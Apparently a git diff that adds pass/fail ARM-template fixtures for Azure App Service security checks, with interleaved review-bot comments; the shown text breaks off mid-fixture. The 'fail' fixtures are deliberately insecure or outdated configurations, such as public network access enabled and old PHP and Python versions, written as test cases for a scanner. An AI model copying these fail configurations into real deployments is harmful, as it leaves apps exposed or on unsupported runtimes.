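Review bot: `"numberOfWorkers": true` is a sharper test than it looks, because in Python `bool` is a subclass of `int` (`True == 1` and `isinstance(True, int)` holds), so a check that guards with `isinstance(value, int)` and then compares `value >= 2` would report FAILED here rather than the UNKNOWN this fixture's name commits it to. Rejecting booleans is the right call, but the reason should be recorded next to the type guard in the check, e.g. `# bool is an int subclass in Python; reject it explicitly`, so a later refactor does not drop it silently. I cannot see the check's implementation from this hunk, so this is inferred from the fixture's expectation.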
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "fail",
+ "properties": {
+ "publisherEmail": "[parameters('adminEmail')]",
+ "publisherName": "[parameters('organizationName')]",
+ "customProperties": "[parameters('customProperties')]"
+ },
+ "siteConfig": {
+ "javaVersion": "13"
+ },
+ "resources": [],
+ "dependsOn": []
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServiceJavaVersion/pass.json b/tests/arm/checks/resource/example_AppServiceJavaVersion/pass.json
new file mode 100644
index 00000000000..efc82c16d50
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceJavaVersion/pass.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "properties": {
+ "publisherEmail": "[parameters('adminEmail')]",
+ "publisherName": "[parameters('organizationName')]",
+ "customProperties": "[parameters('customProperties')]"
+ },
+ "siteConfig": {
+ "javaVersion": "17"
+ },
+ "resources": [],
+ "dependsOn": []
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePHPVersion/fail.json b/tests/arm/checks/resource/example_AppServicePHPVersion/fail.json
new file mode 100644
index 00000000000..ebbd6450ce2
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePHPVersion/fail.json
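Review bot: In both JavaVersion fixtures `siteConfig` sits at the resource top level as a sibling of `properties`, whereas the Microsoft.Web/sites schema — and the PHPVersion and InstanceMinimum fixtures in this same change — place it at `properties.siteConfig`. Whichever path the check reads, one shape goes untested: if it reads `properties/siteConfig/javaVersion`, the `"javaVersion": "13"` fail case is never reached, and if it reads top-level `siteConfig` to satisfy these fixtures, real templates will come back UNKNOWN. Move the block under `properties` and drop `publisherEmail`/`publisherName`/`customProperties`, which are API Management properties and only noise on a web app. For Linux apps the Java runtime is carried in `linuxFxVersion` (e.g. `JAVA|17-java17`) rather than `javaVersion`, so if the check is meant to cover Linux a fixture in that form is worth adding; I cannot see the check's implementation from this hunk.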
@@ -0,0 +1,20 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2022-09-01",
+ "name": "fail",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "httpsOnly": true,
+ "siteConfig": {
+ "phpVersion": "7.4",
+ "scmType": "someValue"
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePHPVersion/pass.json b/tests/arm/checks/resource/example_AppServicePHPVersion/pass.json
new file mode 100644
index 00000000000..49d513235d8
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePHPVersion/pass.json
@@ -0,0 +1,20 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "httpsOnly": true,
+ "siteConfig": {
+ "phpVersion": "8.1",
+ "scmType": "someValue"
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/fail.json b/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/fail.json
new file mode 100644
index 00000000000..d5fdc99f649
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/fail.json
@@ -0,0 +1,20 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2021-02-01",
+ "name": "fail",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "zoneRedundant": false,
+ "resourceGroupName": "[resourceGroup().name]",
+ "osType": "Linux",
+ "sku": {
+ "name": "P1v2"
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/fail2.json b/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/fail2.json
new file mode 100644
index 00000000000..8007f42b557
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/fail2.json
@@ -0,0 +1,19 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2021-02-01",
+ "name": "fail2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "resourceGroupName": "[resourceGroup().name]",
+ "osType": "Linux",
+ "sku": {
+ "name": "P1v2"
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/pass.json b/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/pass.json
new file mode 100644
index 00000000000..9009c374ac4
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/pass.json
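Review bot: The fixtures carry `resourceGroupName` and `osType` under `properties` and nest `sku` inside `properties`, none of which matches how `Microsoft.Web/serverfarms` is shaped in ARM, where `sku` is a top-level resource field and the OS is expressed through `properties.reserved`; these look like Terraform `azurerm_service_plan` attributes carried over. The check presumably only reads `properties.zoneRedundant`, so the verdict is unaffected, but a fixture that does not look like a real template makes a wrong property path in the check harder to notice later. Covering the omitted-property case in fail2.json is the right call, since a plan with no `zoneRedundant` set is deployed non-redundant by default. I would drop the two foreign keys and move `sku` up to the resource level in all three fixtures.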
@@ -0,0 +1,20 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "zoneRedundant": true,
+ "resourceGroupName": "[resourceGroup().name]",
+ "osType": "Linux",
+ "sku": {
+ "name": "P1v2"
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/configFail.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/configFail.json
new file mode 100644
index 00000000000..0450ca1b365
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/configFail.json
@@ -0,0 +1,16 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/config",
+ "apiVersion": "2021-02-01",
+ "name": "configFail",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+ "publicNetworkAccess": "Enabled"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/configPass.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/configPass.json
new file mode 100644
index 00000000000..16aaffd905b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/configPass.json
@@ -0,0 +1,16 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/config",
+ "apiVersion": "2021-02-01",
+ "name": "configPass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+ "publicNetworkAccess": "Disabled"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxDefault.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxDefault.json
new file mode 100644
index 00000000000..301dd920d1d
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxDefault.json
@@ -0,0 +1,15 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "linuxDefault",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxFail.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxFail.json
new file mode 100644
index 00000000000..8ba6c986143
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxFail.json
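Review bot: linuxDefault.json omits `publicNetworkAccess` entirely, and an App Service with the property unset is reachable from the internet, so the expected verdict for this fixture should be FAILED rather than UNKNOWN or PASSED; the test module that asserts the verdict is not in this chunk, so I cannot confirm which it is, but a check that only flags an explicit `"Enabled"` would give a false negative on the most common template. The fixture is also byte-identical to windowsDefault.json apart from its `name`: nothing in it (`kind`, `properties.reserved`, `linuxFxVersion`) marks it as a Linux app, so if the check has an OS-specific branch it is not exercised. I would add a top-level `"kind": "app,linux"` and `"reserved": true` under `properties` to the three linux*.json fixtures so the two families actually differ.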
@@ -0,0 +1,16 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "linuxFail",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+ "publicNetworkAccess": "Enabled"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxPass.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxPass.json
new file mode 100644
index 00000000000..c9d67aa870b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxPass.json
@@ -0,0 +1,16 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "linuxPass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+ "publicNetworkAccess": "Disabled"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/slotFail.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/slotFail.json
new file mode 100644
index 00000000000..a5b2e81ae04
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/slotFail.json
@@ -0,0 +1,16 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/slots",
+ "apiVersion": "2021-02-01",
+ "name": "slotFail",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+ "publicNetworkAccess": "Enabled"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/slotPass.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/slotPass.json
new file mode 100644
index 00000000000..c7eea5b1b54
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/slotPass.json
@@ -0,0 +1,16 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/slots",
+ "apiVersion": "2021-02-01",
+ "name": "slotPass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+ "publicNetworkAccess": "Disabled"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsDefault.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsDefault.json
new file mode 100644
index 00000000000..6c36e64a56b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsDefault.json
@@ -0,0 +1,15 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "windowsDefault",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsFail.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsFail.json
new file mode 100644
index 00000000000..f87d524a700
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsFail.json
@@ -0,0 +1,16 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "windowsFail",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+ "publicNetworkAccess": "Enabled"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsPass.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsPass.json
new file mode 100644
index 00000000000..16252841a9a
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsPass.json
@@ -0,0 +1,16 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "windowsPass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+ "publicNetworkAccess": "Disabled"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePythonVersion/fail.json b/tests/arm/checks/resource/example_AppServicePythonVersion/fail.json
new file mode 100644
index 00000000000..4b3064a7f0b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePythonVersion/fail.json
@@ -0,0 +1,381 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "fail", + "version": "0.25.53.49325", + "templateHash": "16144177164140676603" + } + }, + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "[format('webApp-{0}', uniqueString(resourceGroup().id))]", + "minLength": 2, + "metadata": { + "description": "Web app name." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "sku": { + "type": "string", + "defaultValue": "F1", + "metadata": { + "description": "The SKU of App Service Plan." + } + }, + "language": { + "type": "string", + "defaultValue": ".net", + "allowedValues": [ + ".net", + "php", + "node", + "html" + ], + "metadata": { + "description": "The language stack of the app." + } + }, + "helloWorld": { + "type": "bool", + "defaultValue": false, + "metadata": { + "description": "true = deploy a sample Hello World app." + } + }, + "repoUrl": { + "type": "string", + "defaultValue": "", + "metadata": { + "description": "Optional Git Repo URL" + } + } + }, + "variables": { + "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]", + "gitRepoReference": { + ".net": "https://github.com/Azure-Samples/app-service-web-dotnet-get-started", + "node": "https://github.com/Azure-Samples/nodejs-docs-hello-world", + "php": "https://github.com/Azure-Samples/php-docs-hello-world", + "html": "https://github.com/Azure-Samples/html-docs-hello-world" + }, + "gitRepoUrl": "[if(bool(parameters('helloWorld')), variables('gitRepoReference')[toLower(parameters('language'))], parameters('repoUrl'))]", + "configReference": { + ".net": { + "comments": ".Net app. No additional configuration needed." + }, + "html": { + "comments": "HTML app. No additional configuration needed." 
+ }, + "php": { + "phpVersion": "7.4" + }, + "node": { + "appSettings": [ + { + "name": "WEBSITE_NODE_DEFAULT_VERSION", + "value": "12.15.0" + } + ] + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", 
+ "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + 
"headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "3.4", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + 
"virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AppServicePythonVersion/pass.json b/tests/arm/checks/resource/example_AppServicePythonVersion/pass.json new file mode 100644 index 00000000000..15f4d5e5a36 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServicePythonVersion/pass.json 
@@ -0,0 +1,381 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.25.53.49325", + "templateHash": "16144177164140676603" + } + }, + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "[format('webApp-{0}', uniqueString(resourceGroup().id))]", + "minLength": 2, + "metadata": { + "description": "Web app name." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "sku": { + "type": "string", + "defaultValue": "F1", + "metadata": { + "description": "The SKU of App Service Plan." + } + }, + "language": { + "type": "string", + "defaultValue": ".net", + "allowedValues": [ + ".net", + "php", + "node", + "html" + ], + "metadata": { + "description": "The language stack of the app." + } + }, + "helloWorld": { + "type": "bool", + "defaultValue": false, + "metadata": { + "description": "true = deploy a sample Hello World app." + } + }, + "repoUrl": { + "type": "string", + "defaultValue": "", + "metadata": { + "description": "Optional Git Repo URL" + } + } + }, + "variables": { + "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]", + "gitRepoReference": { + ".net": "https://github.com/Azure-Samples/app-service-web-dotnet-get-started", + "node": "https://github.com/Azure-Samples/nodejs-docs-hello-world", + "php": "https://github.com/Azure-Samples/php-docs-hello-world", + "html": "https://github.com/Azure-Samples/html-docs-hello-world" + }, + "gitRepoUrl": "[if(bool(parameters('helloWorld')), variables('gitRepoReference')[toLower(parameters('language'))], parameters('repoUrl'))]", + "configReference": { + ".net": { + "comments": ".Net app. No additional configuration needed." + }, + "html": { + "comments": "HTML app. No additional configuration needed." 
+ }, + "php": { + "phpVersion": "7.4" + }, + "node": { + "appSettings": [ + { + "name": "WEBSITE_NODE_DEFAULT_VERSION", + "value": "12.15.0" + } + ] + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", 
+ "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + 
